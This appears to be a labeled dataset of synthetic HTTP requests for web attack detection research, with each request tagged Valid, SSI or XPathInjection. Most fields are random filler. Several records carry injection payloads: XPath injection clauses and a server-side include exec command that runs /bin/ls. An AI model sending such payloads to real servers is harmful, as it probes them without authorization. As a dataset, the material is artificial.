GET /bslgido7wttfcHiqwtM/bNhZ3exec/Aar6CtNs/m8SpSXzOW2a3mF2ihR/o9shutdownWGotmp4WHI@devalp/heqhispaRisJn5cl.html?tgfshstzpnwsxa=to0%27+or++++%28i++%3C+++++count%28pnrhw%2Fchild%3A%3Atext%28%29%29++++and++++j++%3C++count%28qsaeln%2Fchild%3A%3Acomment%28%29%29++and+k++%3C+++++count%28muI%2Fchild%3A%3A*%29+++%29+++++or++%27sta%27%3D+++%27+hNtrsmse%27+or&ce=060&eetao=8564&u4ilrZOVY=3sssrkmotjqiH6wab&eltno=jseeibe5t6ezRAr&fSll=akJ&7teoItid=12394 HTTP/1.0
Host: www.rnsg.be
Connection: ebmltisy
Accept: */*;q=0.7
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: e50nRd-6tud, Bsstndm-2w, tyoti-fou9r;q=0.0, kidyzs-tohrg3n;q=0.6, ojcemH-t4
Cache-Control: no-transform
Client-ip: 200.26.183.185
Cookie: thwfrBeFa=ovLpI;shtwliVge8ht=4;e5jsse=YeDeh;ageone9=rY5b
Cookie2: $Version="724"
Date: Sun, 19 Nov 06 20:36:13 UTC
ETag: "S7hKnppQ3N92HRjMm_"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: h3ni@Eb7nestF.gov
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Thu, 23 Jul 09 01:34:02 GMT
If-Match: "LfaONMigbqpIg8dIt"
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: aten uiro=tanhlba
Authorization: NTLM VGlpYXBsaGlydHI4a25Lc3VwYTNOZWlzVGFhY2doYWk4ZWVz
Range: -777
Referer: http://www.1xets.gov/mdrsre4h.nsf
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 3.2; sn-wh; rv:3.8.5) Gecko/68645336
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 072x540
Via: 3.4 19.21.64.198:6097, Sahein/1.8 112.174.8.216:4960
Transfer-Encoding: deflate
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 856 www.tesn.js "kvooddadai8neb" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 9305784502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35786
Start - Id: 13411
class: Valid
GET /PqQu0MlW@Npasswd4w/iialar7a3admoe.shtml? HTTP/1.1
Host: www.ouojthih.de
Connection: close
Accept: text/xml, text/*, text/plain
Accept-Charset: windows-1250, windows-1258, koi8-r, iso-8859-1;q=0.1, euc-tw;q=0.5
Accept-Encoding: deflate;q=0.8, compress;q=0.3, deflate, gzip, gzip
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 28.232.68.156
Cookie: anoviqckw=i0i6e rthboot.ini%)l-3nsshm;nindt=nyebrgn1etgpSlt$h|[2;rgZftpF_in.@Glz=lgetsnh;YnnsiaHdiane=tu8Eehqehlek;da0dciEkurefgu=7agirz;pRletcnlgpajt=mlqo
Cookie2: $Version="469"
Date: Tue, 31 Oct 06 13:31:41 CET
ETag: "2guVkX@4PUMyz9kd"
Expect: 100-continue
From: eLfi@jwo4ip.biz
If-Modified-Since: Wed, 06 Jul 05 21:50:51 GMT
If-Unmodified-Since: Thu, 18 Feb 10 21:10:01 GMT
If-Match: *
If-None-Match: *
If-Range: "Iip5NlSN7Ox9n1T"
Max-Forwards: 2254
MIME-Version: 6.9
Pragma: 7u='anulr'
Proxy-Authorization: Digest username="naujorla"
Authorization: Digest opaque="teipl"
Range: 052-,83779-96
Referer: /nmtOb9d/tnnp9/tposet.exe
TE: trailers,deflate,trailers
Trailer: Range
User-Agent: Mozilla/3.1 (Windows; U; WinNT 2.5; si-Tn; rv:1.0.9) Gecko/24523174
UA-CPU: StrongARM
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 315x4063
Via: HTTP/7.8 35.134.159.9
Transfer-Encoding: gzip
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 515 10.196.127.38 "remJrtutyteo" "Sun, 05 Oct 08 13:10:27 GMT"
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 8913868514720115974
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13411
Start - Id: 3540
class: Valid
GET /yNtBqFX21/nC-6iqGxMq/eo20ddveih2/hYoKTUyJGeJPYTse/5AQ/ed@RhCK/xS.css? HTTP/1.1
Host: 239.160.150.148:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 222.249.123.200
Cookie: a1dt5koorrtleiS=m=ro;hDyc6brrAZtnnn=auD-u@Tkd8;anno9ptsz=s s;3mochar@poxexec=og<H[eacceptiH+h2th;eenAttc4tnnuDmt=9361214
Cookie2: $Version="844"
Date: Fri, 11 Mar 05 07:40:27 GMT
ETag: W/"GzK3OIJX9n_w7S0ueg"
Expect: 100-continue
From: en6o@GjeessSofa.org
If-Modified-Since: Sun, 17 Oct 04 19:07:22 UTC
If-Unmodified-Since: Tue, 23 May 06 20:38:20 UTC
If-Match: "S.CdvTILxHDKqQu68"
If-None-Match: *
If-Range: Sat, 10 Jun 06 16:57:16 GMT
Max-Forwards: 495
MIME-Version: 3.4
Pragma: je='J'
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: NTLM T2FuSWF6YXNpZTFpcjJyaXRsNWRsMG1pYWV0ZTV0dDI=
Range: -5
Referer: http://Nmtp.cz/Jdovcsc/emsb/fbbfee/swhN3/c4ty.html
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/1.6 (compatible; MSIE 0.6; Windows NT; deoossehtq; eeo9goqpm)
UA-CPU: MIPS
UA-Disp: 0012,4574,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5560x152
Via: FTP/4.3 217.45.8.110, FTP/5.3 www.aNlStnDN.css
Transfer-Encoding: identity
Upgrade: tdodl/5.1, fhs/3.2, 04esnH/5.0
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 08087704716417
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3540
Start - Id: 18596
class: Valid
GET /f12lusr/ct4aeatusfg2eesol/fe3rrsldjijph/oKf6CXq5q6CJaFnetcat.mspx?3fDJWU=+8pb9tGY&r6eoem1=rnhtpasshttps&nRe7=602&tbgaim4=in1bif&wtxhapTsao1va1=36466743&phfbodd=eble HTTP/1.1
Host: www.ms8rpeDo.biz
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-6, cp-932;q=0.0
Accept-Encoding: identity, deflate;q=0.3, identity;q=0.1, compress;q=0.2, compress;q=0.6
Accept-Language: e6lspScN-ettNutO, nsa-1sIetr, r6-m2orn;q=0.7
Cache-Control: no-transform
Client-ip: 19.136.248.219
Cookie: KSVnDSVS@._=iesqdnpjn2S29ta;snn886r=execrbodyak2es%a
Cookie2: $Version="71"
Date: Thu, 24 Apr 08 20:38:17 UTC
ETag: "vWm7vOC-z_8BLqnHk.@U"
Expect: 7xlr=7rgetne;T8mih
From: issa@v6tset.fr
If-Modified-Since: Sat, 24 Jun 06 06:24:25 CET
If-Unmodified-Since: Fri, 06 Jun 08 06:23:45 CET
If-Match: "VIx98_4XQ1Ji4kmmf"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 6.0
Pragma: to=n
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: Basic ZDF0Tm1uZDpsZG5kYXI0
Range: 0-15536,8-008663
Referer: http://shsiik.be/vns2aXt/eura7s.wmn
TE: gzip;q=0.5,trailers,gzip;q=0.8
Trailer: If-Range
User-Agent: rP5@zH http://www.hihetwi.net
UA-CPU: StrongARM
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 924x1764
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: cLsn
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 84.119.251.98
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18596
Start - Id: 21966
class: Valid
GET /aXuKv-uoeiFr/ytrxAoeihao/inihb5pgLAk/loGXuSeOMG6iEQ2PTyZ/iaoeFm9rAgoDgrewash1/r3kiC.mspx?amiTrrqONcur=6664&hwaYrdr7=95900295&le=eI0&sccangdoiiihgtI=m2rkhFJG&vu=443&ogsamhek9katn2=twhhseD0&yfl=ctte&infcso=isystemerssQeLAsa1&j4tn4=lsm%2F&all_lulXhtaccesG.fm=0&ay0nontdo=oRnfarbot%3AS%5C%5Cidicy&go=boot.iniizainsert&DaBpositionrcpEZ=e6lYIR3s-MSb&cetDthBiS4=te7kV&Emt7aan3tsra=73308809 HTTP/1.1
Host: 221.191.66.157
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, us-ascii, iso-8859-2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-age=3946
Client-ip: 3.169.52.148
Cookie: TRau7sdWoNeMw=msh'dh@0a0e~h;s;oifljtogydtc94t=ptwoOeshb2l;rtoufeEpv=insertlhg';ftlRidnEGsB=foall]lU-7;raexeefevqd=olRo8st;chbtwepsacidee=1406891
Cookie2: $Version="56"
Date: Wed, 09 Jun 04 12:11:34 CET
ETag: W/"bquNntauCwXOwIv9c"
Expect: neoot=oinv6tgt
From: oIci6Moi@sbleMCwj.be
If-Modified-Since: Wed, 27 Apr 05 12:17:44 UTC
If-Unmodified-Since: Sun, 10 Apr 05 12:59:37 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: cy2u 3lxxbd=etqtaea
Range: 2-874,8-,3113-623962
Referer: http://www.hyak.st/tpnt/xiMtruwi/sibmjIlu/ddts5dl.php4
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.1 (Windows; U; WinNT 3.2; cl-eu; rv:0.1.3) Gecko/54932975
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 5.9 2.128.65.161:17801, 4.8 www.sxHt.png
Transfer-Encoding: gzip
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 198.11.68.176
X-Serial-Number: 09176432061314
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21966
Start - Id: 40105
class: SSI
GET /ab_euOMH51r2n/i1_b3yRoo/rtXdtn7Itd/QETfromY/94Ha9HeJXom/madi9OIt5ey/rtrosspnt9hnrea.css?sa1eelllsiti97e=9uf&9Jy0=lmainctda&tenhthwn=nxyrEa&aCi8odnzjfo7rhr=1nsr1etrlmhdhiNmi&psihgOnegs4R=667689&xrso7n=EgLeuoounFra&6paKR4eZ=%3C%21--%23exec++cmd%3D%22%2Fbin%2Fls++-l++++%2Fhome%2F9laE3%2Fosalieay%22+++--%3E&rier=oTt67am&bo=525 HTTP/1.1
Host: www.vgvmteh5a.net
Connection: lqsctuav
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 113.207.135.168
Cookie: aanqW4u=44823;h8ih7qk3e=22554182;Hifdelxsteiedl=i9isstwsT2t;rAi9Hsngfshvtii=+lnl1k;arzoegqlrTnqw=zRtgy
Cookie2: $Version="674"
Date: Thu, 17 May 07 23:27:45 CET
ETag: W/"aBKdxlbr.ECzHxyEdr"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 06 Aug 07 24:54:10 GMT
If-Unmodified-Since: Thu, 17 Nov 05 07:52:05 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 8035
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic bXQzVHI6aWFkaWNJbA==
Authorization: NTLM Y0NlbGl0cm9naGdyMEV1MUplMXdkZXVyNkV6ZG90dEF4bnlxVWV5ZVFpYUZo
Range: 12545-4
Referer: /Icnu2ye/5erTvbSg/ttfe/atc0ct.fgf
TE: deflate
Trailer: Proxy-Authorization
User-Agent: n.gYLy http://www.fDssn.it
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 192x9251
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 811 238.249.239.145 "usneitnSur" "Wed, 21 Dec 05 08:03:21 UTC"
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40105
Start - Id: 10802
class: Valid
GET /snecInt6yir/l6S0/G5servicesDZobjecta2exec_servicesfwr/ro8y-kJ78iylctwpj/itgyeet/iaeoaetz/ap7r4eoi/e6vPURdFO.Pzo1NG3N/rounh/binrZ/rj2Qf3GBM6Nsg_OX8x.aspx?ahaSia=+&niaoein=tTFahAN%40lD&nZcobwMa=hgHBH6Lf5jP&einDoxbR=uik%400lpEs6aE&sK8vebtaoeupnu=bn0hohgj HTTP/1.1
Host: www.Ahr0rtvar.be
Connection: nn3saTRH
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: annss-t, fEh-ls3z;q=0.1, Ei-7eo
Cache-Control: max-stale
Client-ip: 195.254.67.11
Cookie: cta=s6tnAhcjeb;Joinm@Gggnkexec=vgBu;ccU=tNtmaueuplIonoaley;iJe=odGGWrDWQb8
Cookie2: $Version="9"
Date: Fri, 22 Sep 06 06:47:56 CET
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 31 Aug 04 01:05:21 CET
If-Unmodified-Since: Sun, 18 Oct 09 12:33:06 GMT
If-Match: *
If-None-Match: "6B5AZ.GfuRjsDNKXzXv"
If-Range: Thu, 02 Dec 04 12:10:47 CET
Max-Forwards: 380
MIME-Version: 5.1
Pragma: erricsaO=iaal
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest cnonce="nveihPip"
Range: -605203
Referer: http://a1bbiot.cz/5nge/hn6lwqn/xtmj/eknnlurd/nlFmad.mdb
TE: gzip;q=0.3
Trailer: Cache-Control
User-Agent: wD.6fC@ http://www.Ne1rcfi.gov
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4636x443
Via: 6.3 www.esozayB.jpeg:16118, 7.0 www.arwdtt.jpg:5811
Transfer-Encoding: deflate
Upgrade: dfeo/3.1, 4aehpf/3.9
Warning: 224 www.SIeice.tiff:5 "otetmretYa" 
X-Forwarded-For: 44.92.107.214
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10802
Start - Id: 48921
class: XPathInjection
GET /eEeease9zvesen/d7h/utpwenEg.pl?tntewipnMrpwos=z&fataru=9l2dlm%2F0s%2Fuerai%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D74%5D++++%7C++++eiupPe%2FeaA%2F4u%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D272%5D+++or+%27lty%27++++%3D+++%27&aiidwcsopaoE=s+lna HTTP/1.1
Host: 108.85.226.79
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity, compress;q=0.4, identity, compress
Accept-Language: rnatdoi0-eEpy, sdtiyf4q-ioirh7s
Cache-Control: min-fresh=5108
Client-ip: 187.187.151.241
Cookie: gd5e=81777580
Cookie2: $Version="6"
Date: Wed, 09 Nov 05 21:45:13 CET
ETag: W/"cAe5kf1_9HIkvNMxj_FA"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Sat, 15 Jul 06 04:58:38 UTC
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: "JY5ax02BTUC8TGhj"
If-None-Match: *
If-Range: "Ad@kEKKeND1Ur7a.W"
Max-Forwards: 090
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: Basic em9laHJpdTp0cmk0bmh3Zg==
Range: 1264-
Referer: /tfghe/trr7r/fiwlbew/crlrsL/u40e6d.cgi
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/2.0 (Windows; U; WinNT 3.5; hd-rh; rv:2.6.0) Gecko/80942490
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: identity
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 893 27.190.237.63 "taIazhQdsogaUn5mo" 
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48921
Start - Id: 24843
class: Valid
GET /mO4y6A5xayT/hdEtti/Q2/noecjd.r0qnj0goY/reerahflcltpanmw/xI2l0u/en@XUwR_U.1-pxfhp.jpg?nl=97466&afsbndsda=-fawhttpsteoas&rh8arp=lethShdrsakrr+&ClSOd=73487975&nncissl6ssz9=tjOWn&3ctenunEjurm=tt&tseswancnn=09&hya=46378&1rost6qethl=rAw HTTP/1.1
Host: www.myyiu.com:80
Connection: close
Accept: text/plain, text/plain;q=0.3, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: otnc4-htefob
Cache-Control: only-if-cached
Client-ip: 210.248.202.218
Cookie: Iokwi5Inri=t9thle+5hnllo:Mc;lonhcto=cdtprocessing-instructioni r
Cookie2: $Version="51"
Date: Sun, 28 Nov 04 24:49:35 GMT
ETag: "wULiVputeo2UNO2o"
Expect: 100-continue
From: neyaahot@swrEr.com
If-Modified-Since: Wed, 16 Aug 06 16:18:20 GMT
If-Unmodified-Since: Mon, 20 Nov 06 09:22:02 GMT
If-Match: *
If-None-Match: *
If-Range: "P0QX3ezlc1JFZZdMF-rf"
Max-Forwards: 219
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ue3ee emteai=apsdea
Authorization: soiA o0hYbc5=fraeras
Range: 89-,-8
Referer: /nEhIee3.pl
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 1.6; Ec-o0; rv:8.4.2) Gecko/30415795
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 577x412
Via: 7.6 www.hex9i3s.jpg, 9.5 104.185.4.56
Transfer-Encoding: compress
Upgrade: eThto/9.1, osm3d/8.9, tnv9v/5.6
Warning: 155 www.eathap.js "rreiel0tsh5eepq4mnae" 
X-Forwarded-For: 158.74.188.248
X-Serial-Number: 934492
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 24843
Start - Id: 78
class: Valid
GET /Ed/sjand_.Uy65A_zhd/EeseazbIDhnh3a/g-qXyiHLOd9DP.html?Utjl8sdeoAp8ee=4&Bconnectl-=62pAA&Zeaw=imgcascripthdi%3D1h%5CfebetweenaE HTTP/1.0
Host: www.A6sn.net:7
Connection: sssyeto
Accept: application/*, application/*;q=0.0
Accept-Charset: ks_c_5601-1987, cp-932;q=0.9, iso-10646-ucs-2;q=0.4, ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 91.171.86.36
Cookie: Bmpvll8oqy=8496;aapdqdbx=tENuu;tldtihp=uhduol3eratt;ugtttrsosh= t6gusystemstdineix/gaeahttps
Cookie2: $Version="49"
Date: Wed, 10 Oct 07 10:33:22 GMT
ETag: W/"R3e8YMO14FGC9C2tMyao"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Fri, 05 Feb 10 03:15:09 UTC
If-Unmodified-Since: Fri, 27 Apr 07 24:50:54 CET
If-Match: "Vscl-KSB1pEKcJ_g"
If-None-Match: "7j6LsF6VpH5p_SaTd"
If-Range: "IRqk2IiEDppwOeWvL"
Max-Forwards: 3
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/5Eth/NasEi/4flTue17/eeiv/xfrHtst7.gz
Authorization: oahuat qoayeoi=rtas
Range: 41396-563,553741-
Referer: /oiaiqroi/rt0Cea.msf
TE: chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/8.1 (Windows; U; Win98 3.1; 8t-7i; rv:7.9.0) Gecko/33814884
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: FTP/5.5 15.31.80.191
Transfer-Encoding: compress
Upgrade: plohnd/1.0
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 365994
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 78
Start - Id: 16884
class: Valid
GET /yIXp.cHw-.Ws16K9NnF/slner/5si6aeii4L/wZZ.K6qfX6G6A4ich1/7l9TZN1m-0symb/Eedm2ososegle/rotraue6o8jIobbaf/hueae8thgani/d8qmja/bdr1/et.pl? HTTP/1.0
Host: 0.127.212.252
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-hebrew;q=0.3, windows-1250;q=0.8, iso-8859-8-i
Accept-Encoding: deflate;q=0.6, gzip;q=0.4, gzip
Accept-Language: AxO-gedAhr, whiiscf-laRrzd, b0eduioH-boi;q=0.1, Sl4br-hatIben
Cache-Control: max-stale
Client-ip: 16.48.87.218
Cookie: 2FDaNydivxZH=191;h5wgetudrpD=eD7gN2evRmx5sleioh
Cookie2: $Version="7"
Date: Fri, 15 Apr 05 06:19:37 GMT
ETag: W/"vkM9y@_uojtRj3CKeLK"
Expect: rawdunO=nst6
From: pwexendA@yugteithg.uk
If-Modified-Since: Sat, 15 May 04 01:30:45 GMT
If-Unmodified-Since: Wed, 15 Mar 06 20:25:14 UTC
If-Match: "RkuUz7V5r8dQaEKV"
If-None-Match: "-oluy8U2@u@zymPL"
If-Range: Sat, 11 Feb 06 01:45:09 CET
Max-Forwards: 6839
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM ZXJ0M25ybnVyaWNtcVplbnRkNzduaWFhZTB0bXJzbkVpZHNBdGUyZWVvZW9o
Range: 431-,58-633271
Referer: http://6ogEP.be/Efeth/eeeyr/nahAe0mw/qScn/uroItw.asmx
TE: gzip;q=0.3,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.9 (X11; U; Solaris 4.1; as-n2; rv:9.2.7) Gecko/70995314
UA-CPU: 68000
UA-Disp: 3594,2182,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 124x8989
Via: 2.7 www.isaB.jpeg
Transfer-Encoding: gzip
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 024 248.14.211.213 "tommso7teoesEnlsd" 
X-Forwarded-For: 12.168.61.248
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16884
Start - Id: 9033
class: Valid
GET /shutdownacceptmochaEm/dtressmxyesd/auTE/vuCpasswdvarRT/thfeschuzrft46/ysuqo4dtaei3a2dee/t6RpGQlWKpLPdOuHZch/Lb.tiff?nibnlnatg=oechoc&20c=OzaiEeuttatPace&itnOy0h=kcr-includepenleinputOhHy%3Fea HTTP/1.1
Host: www.e8heeNa.st
Connection: oYan3dO
Accept: */*
Accept-Charset: macintosh, cp-936, euc-jp;q=0.6, windows-1254;q=0.7, big5;q=0.0
Accept-Encoding: deflate, identity;q=0.4
Accept-Language: Doe-oDofwtha, 18a-srs;q=0.4, meveetO-e3hw, 4aSs12-tettf;q=0.1, sfi-o
Cache-Control: no-cache
Client-ip: 68.30.174.51
Cookie: mailKdeletei=jenshsudmuee9;aRetrim=9074127836;ca7sSl=o
Cookie2: $Version="8"
Date: Thu, 11 Sep 08 11:10:20 CET
ETag: W/"Y14f4SrMfgaAbDaMHQq"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: asncwO@udwr.ch
If-Modified-Since: Sat, 30 Oct 04 03:03:05 UTC
If-Unmodified-Since: Tue, 16 Oct 07 03:10:56 UTC
If-Match: "ujr.bBPsxujW9is"
If-None-Match: "K5b1yX_5s@_BiLao7-X"
If-Range: *
Max-Forwards: 2584
MIME-Version: 0.6
Pragma: xw=D0tumaa
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: azal cnoOeee=eroD0h0
Range: 5-300138,73-
Referer: /sntnt/neunhk/rgnwbg8.tar.gz
TE: trailers,chunked;q=0.3
Trailer: TE
User-Agent: lnisp (iS3oG8Kw; m-UmQsnkUy; sZlUfY)
UA-CPU: 68000
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 454x187
Via: FTP/8.3 14.168.170.28
Transfer-Encoding: deflate
Upgrade: mtret/0.1
Warning: 922 50.163.11.232 "daeh5so" 
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9033
Start - Id: 34632
class: Valid
PUT /o7TqqZM0/rfnwV/e2iPaJzREt2Erqoc_/hUUsRI6/eAat/SGopenAbinrN/tetcFyY1dCqbgsoundrhtpass/3F0tQlIp7-gA1G4DCO/hRt8z7r.mspx? HTTP/1.1
Content-Length: 250
Content-Language: liciy1r
Content-Encoding: gzip
Content-Location: /eypmd/Suesi/yTqxanTt/aoarltt/xcssgstf.dll
Content-MD5: bm90OVFyYWVyU0J0Y21kbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Dec 07 17:43:56 CET
Last-Modified: Fri, 22 Aug 08 12:48:17 CET
Host: www.tallrtedeo.org:80
Connection: dobnt
Accept: video/*;q=0.3, image/jpeg, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Qezn-wrusr
Cache-Control: no-cache
Client-ip: 15.193.160.4
Cookie: c2t9c=0896291995;0enodegPfrcpRqrCt=tma;cX4cnTmD6G=sgz
Cookie2: $Version="82"
Date: Sat, 07 Feb 04 08:39:28 GMT
ETag: "KRbEqcWo7niUBVKM"
Expect: 100-continue
From: ebe2@s8zmeu.com
If-Modified-Since: Sat, 07 Feb 04 14:46:01 CET
If-Unmodified-Since: Fri, 21 Sep 07 20:55:44 CET
If-Match: "WhK731wnEgrb0t5NDdx6"
If-None-Match: *
If-Range: Sun, 14 Dec 08 14:50:32 UTC
Max-Forwards: 9
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.x4ihPxh.ch/M14aso.sh
Authorization: NTLM dGJTZnNhb3hhd2xzdHRzRGZ5aWVsN2VydGVlaTVhZXdTbA==
Range: 55937-
Referer: /uewcpufn.jsp
TE: gzip
Trailer: Connection
User-Agent: c5.ufKd http://www.nrnimr.it
UA-CPU: 68000
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: 6.6 www.thYic.jpg
Transfer-Encoding: identity
Upgrade: udftat/1.5, tofti2/8.0, cbCoi/4.0, dnsten/6.9
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8fpl2rriRn4erI=svr&9Spebot=7721473351&eMtt=c91vvxwewn3e&t8Oen=Bt9p$&LaDid5igyKF8d=r|esbntaowqnlinkhi&y5o7aVS2itu=u~eerwinntrbcinsert%\rkh&VAFH=684268835&bnlgell=6&PSgroup byrcD=e0euQhaqEw&i68etbsb8r6sir=629836104&uef90uot=nnT3hyc8Sw&tyhn5=3

End - Id: 34632
Start - Id: 49095
class: XPathInjection
